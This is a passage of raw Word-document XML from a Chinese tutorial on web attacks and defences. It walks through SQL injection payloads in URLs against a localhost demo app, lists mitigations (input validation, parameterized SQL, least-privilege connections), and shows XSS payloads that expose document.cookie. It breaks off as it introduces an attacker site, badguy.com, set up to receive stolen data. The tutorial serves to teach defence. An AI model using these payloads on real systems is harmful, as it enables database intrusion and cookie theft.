      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:line="340" w:lineRule="exact"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3860800" cy="2378075"/>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201201010828028321.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3864684" cy="2380846"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3821430" cy="429895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201201010828054435.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3825917" cy="4304158"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>现在我们把job表中的所有数据都查询出来了，仅仅通过一个简单的恒真表达式就可以进行了一次简单的攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然我们把数据都查出来了，但数据并没有太大的价值，接着我们再确定下数据库的表名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>首先我们假设表名就是job，然后输入以下URL：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1'or" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1'or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>1=(select count(*) from job)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>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201201010828089122.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2155190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>当我们输入了以上URL后，结果服务器返回我们错误信息，这证明了我们的假设是错误的，那我们该感觉到挫败吗？不，其实这里返回了很多信息，首先它证明了该表名不是job，而且它还告诉我们后台数据库是SQL Server，不是MySQL或Oracle，这也设计一个漏洞把错误信息直接返回给了用户。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>接下假定表名是jobs，然后输入以下URL：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1'or1=(select%20count(*)%20from%20jobs)%20--" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1'or1=(select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">count(*) from jobs) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>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201201010828095925.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2239645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>现在证明了该表名是jobs，这可以迈向成功的一大步，由于我们知道了表名就可以对该表进行增删改操作了，而且我们还可以猜测出更多的表对它们作出修改，一旦修改成功那么这将是一场灾难。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>现在大家已经对SQL Injection的攻击有了初步的了解了，接下让我们学习如何防止SQL Injection。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>总的来说有以下几点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>永远不要信任用户的输入，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>要对用户的输入进行校验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>，可以通过正则表达式，或限制长度，对单引号和双"-"进行转换等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>永远不要使用动态拼装SQL，可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>使用参数化的SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>或者直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>使用存储过程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>进行数据查询存取。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>永远不要使用管理员权限的数据库连接，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>为每个应用使用单独的权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>有限的数据库连接。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/sdya/p/4568548.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>利用SQL注入漏洞登录后台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>XSS注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>XSS 全称(Cross Site Scripting) 跨站脚本攻击， 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时，脚本就会在用户的浏览器上执行，从而达到攻击者的目的.  比如获取用户的Cookie，导航到恶意网站,携带木马等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>假如有下面一个textbox</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;input type="text" name="address1" value="value1from"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>value1fro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>是来自用户的输入，如果用户不是输入value1from,而是输入 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"/&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;!-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>那么就会变成</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;input type="text" name="address1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>value="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"/&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;!-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> "&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>嵌入的JavaScript代码将会被执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>或者用户输入的是  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>"onfocus="alert(document.cookie)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>那么就会变成 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;input type="text" name="address1" value="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>" onfocus="alert(document.cookie)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>XSS之所以会发生， 是因为用户输入的数据变成了代码。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 所以我们需要对用户输入的数据进行HTML Encode处理。 将其中的"中括号"， “单引号”，“引号” 之类的特殊字符进行编码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在C#中已经提供了现成的方法，只要调用HttpUtility.HtmlEncode("string &lt;scritp&gt;") 就可以了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>XSS攻击场景</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dom-Based XSS 漏洞 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>攻击过程如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tom 发现了Victim.com中的一个页面有XSS漏洞，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>例如: http://victim.com/search.asp?term=apple</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Tom 先建立一个网站http://badguy.com,  用来接收“偷”来的信息。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
